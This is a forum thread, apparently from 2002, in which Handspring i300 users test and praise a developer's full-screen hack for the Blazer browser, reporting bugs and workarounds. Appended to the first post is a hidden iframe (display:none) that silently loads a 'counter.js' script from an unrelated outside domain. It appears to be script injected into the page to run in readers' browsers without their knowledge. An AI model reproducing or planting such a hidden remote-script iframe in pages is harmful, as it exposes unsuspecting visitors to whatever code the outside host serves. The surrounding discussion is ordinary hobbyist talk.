+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast

Post New The Jake's Blazer Full Screen Hack

Hi, I just recieved the 1st. Beta of The New Jake's Blazer Full Screen Hack, and I must say It Blew my MIND!!! Its incredible what this man can do. You are theeeeee MAN!!

Well, since I'm a beta tester and I'm suppose to give first impression. Here we go:

The hack works, but has some flaws. Like when I try to connect to the internet, I guess the popup window interrupts the hack and the normal mode comes again.

The way that I bypassed this is to connect directly to the network and then open Blazer

So Far the Machine hasn't crashed

The hacks that I'm using right now are:

3Alarm Hack 2.0
    Crash 1.2
    I300 Blazer Hack 1.0
    I300 Graffiti Hack 1.6c
    I300 Logo Hack 1.0a
    Keyboard Hack II 1.01
    McPhiling 2.12
    PCID Helper 0,1
    TealEcho 2.05
    TealLaunch 2.60
    TealTools Hack 1.10.00

Other things that the hack should have is to make a "hot spot" or a extra button, a stroke of the stylus or something to disable the graffiti area functions. since sometimes you want to click on something in the website and the menu, or calc, buttons pop up, or even the graffiti functions comes up. so a option to disable this should be great. But also with an option to activate agan, since there is a lot of websites that need user input, and we need the graffiti for this.

But overall is a great first attempt to this and I encourage The JAKE in doing all this, and the desired num pad hack, that I hope he tries to do it sometime

Keep on the good work JAKE!!!!!

PS. If I find more useful info will post later<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by yorch; 04-08-2002 at 01:00 PM.
    visit http://www.yorch.net your place for Pocket Pc Phone Edition Dialpad Skins!

Guru
    Some comments:

1. This isn't a LOGO hack. It is a modification hack to Blazer that lets you use the full screen

2. Its not perfect. My latest version is usable, but some of the windows don't draw right... and I don't expect to be able to fix this anytime soon, if at all... so I might just release it as is.

Either way, keep an eye out.

Jake
    All About Jake

Well, I have the 2nd Beta on my Phone

I will run more test later at night, ( to use my Off-Peak Minutes ) but I must say, with this hack, Mapquest looks Sweeeeeet! all the Maps look really nice with this.

Yeah, now after the connection with network, Blazer goes back to to full mode, so that seems to be fixed.

I will let you know more later at night

Trying not to sound corny, but I have to say this..........

Jake......

I LOVE YOU MAN!!!..... :p

ok,....I need to let that out.....:p

you make my little wondertoy, do More wonders....snif, snif....I think I'm going to cry....
    visit http://www.yorch.net your place for Pocket Pc Phone Edition Dialpad Skins!

You know, I was wondering why you answered the way you did, and I just realized that I put "LOGO" hack, DUH!!!, Sorry, but lately, I've had that "logo" word around a lot, and I kind of did it by mistake. Maybe Jake or other Moderator can change the title for this thread, since is wrong.

sorry 'bout that

Flip Blazer Hack

I know its a stretch, but is there a way to flip the screen 90 degrees with the full screen to show a landscape view of Blazer?

Steve

Guru
    A rotated display isn't very likely. There are just too many system functions to override. There are hacks that can do it, but they don't work on the i300 and thus it makes things difficult.

If Handspring ever releases a version of Blazer with the ability to rotate the display, then I think it should be possible to enlarge the display to use all of the i300's 160x255... however, hacking in rotation support into an app that doesn't have it thus far seems like a stretch for now.

Jake
    All About Jake

Jake, as always, you are the man. When will we get to see this magical wonderful hack? Not to rush you...take your time and get it right. Just curious if you've got a ballpark idea of when it'll be ready. ; )

Jake, as always, we cannot thank you enough for developing affordable solutions we all benefit from. You still looking for that job? Have you tried Samsung? Great hack my friend.

PalmVenue Guy
    Any chance you could post the beta here?

Guru
    Well, I'm working on a new version. However, the current version just crashed my palm hard... which means I'm doing something really wrong.

I do have the source code to my previous version, but I have to recover from this crash first...

My next beta I'll post publically.

Jake
    All About Jake

ITS AMAZING... ITS CRAZY.... ITS AWESOME

U GUYS HAVE TO DOWNLOAD IT RIGHT WHEN IT COMES OUT.... Ok enough screaming.... Well Jake U did it again..... I have to agree with yorch...

I LOVE YOU MAN...... My 300 loves u 2.....

Guru
    Here is is. Its caused me a bunch of headaches.

1) Read the Readme, damn it.
    2) I disown this hack. Don't look for any fixes or new versions anytime soon.

Jake
    Attached Files
    All About Jake

Thumbs up

Thanks Jake

Guru
    no problem. Hope it works for you guys. It hasn't undergone extensive testing or anything.

It gave me more trouble than I can really convey here. Maybe it will fall back into my favor and I'll work on it again some day... but for now, I'm putting the code away for a while.

Jake
    All About Jake

Jake,

This was built for Gopherking!! You truly are a rock star Jake!

PayPal coming!!

Craig
    I thought grafitti was illegal?

Yep, works perfect me.

Jake, great job. I love the hack!

yannco

Same here! I installed the hack, with the others from JAKE already running and everything works great

Thanks Jake. Your apps have been more than valuable. I can't wait until the 330 comes out so you can find more fun ways to customize it. I can not contribute money to your i330 fund, but I may be able to get you one for free. Please PM me later and we can talk.

homer

Well, I have played yesternite with Blazer, and here are my impressions:

The hack seems pretty stable. I went to all my bookmarked websites, (SprintPCS Portal, Yahoo, Mapquest, Accuwheather, Go2Online, and of course, this forum) A Whole lot better than the first two betas. the pop-up windows are complete and once they go away, Blazer returns to their full screen mode.

I didn't crash at all, well, one piece of advice. Don't use the hard buttons to quit the program because it will reset. then best way to quit Blazer is to check on the bookmarks, and when the Graffiti mode comes up, just hit "Home". I pressed the hard buttons and the system crashed.

Anyways, Jake, don't take it so hard on yourself and on the little hack. This hack is great and it does what it is suppose to. Guys Don't expect Jake to make this crack work extremely perfect with Blazer, Jake didn't make Blazer, He tries to reverse engineer, and Its great, of course the hack works, Cool, enjoy it, its free, Donate if you can. Thanks a million Jake

P.S. Jake, Guru, Whenever you can.....the diapad skin....you know....that thingy that everybody wants.....:p ...of course, when you have some spare time....

P.S. Jake, Guru, Whenever you can.....the diapad skin....you know....that thingy that everybody wants..... ...of course, when you have some spare time....
    Take your time buddy. You've already done so much. Lets be mindful of the pressure we're putting on Jake here. Don't want it to become an obligation for him. There's no rush Jake should you decide to work on this.

yeah, I know, ...He had done a huge lot...that's why take your time